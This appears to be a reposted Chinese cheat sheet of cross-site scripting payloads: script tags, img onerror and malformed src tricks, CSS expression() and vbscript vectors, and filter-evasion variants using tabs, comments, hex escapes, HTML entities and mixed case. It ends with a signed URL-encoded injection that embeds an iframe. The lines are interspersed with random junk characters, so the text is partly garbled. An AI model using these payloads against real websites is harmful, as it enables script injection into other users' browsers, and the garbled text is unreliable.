<script>alert("跨站")</script> (最常用)% }6 j( e4 i: |& G
<img scr=javascript:alert("跨站")></img>
3 h, A. n# t0 Y<img scr="javascript: alert(/跨站/)></img>. Q' Z8 Z& N# c: t7 ?! q
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
% \5 o. s- l- }<img scr="#" onerror=alert(/跨站/)></img>
8 g7 `2 B5 ^. q! ^<img scr="#" style="xss:expression(alert(/xss/));"></img>. O' |/ \/ k/ C1 q# O9 Z+ E! e
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释) `8 l; Y# A H
<img src=vbscript:msgbox ("xss")></img>6 l! y& |( ? Y3 M: E+ K
<style> input {left:expression (alert('xss'))}</style>0 n; P7 {' q: P. q" h9 U! i, f
<div style={left:expression (alert('xss'))}></div>, H8 i9 A8 b+ \. j- J& ` u& P
<div style={left:exp/* */ression (alert('xss'))}></div>5 W( w" q) q% l2 ]
<div style={left:\0065\0078ression (alert('xss'))}></div>, a9 z$ Q" w; R. p( y* b& f h
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
" ?: @4 @! J, P" O# aunicode <div style="{left:expRessioN (alert('xss'))}">3 L0 n y9 K ^9 C. T, d) n/ }
4 Z1 M! B2 u' O3 I( a) N; `"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["5 q8 v9 Y, b& w* c; c7 s3 Z2 d
|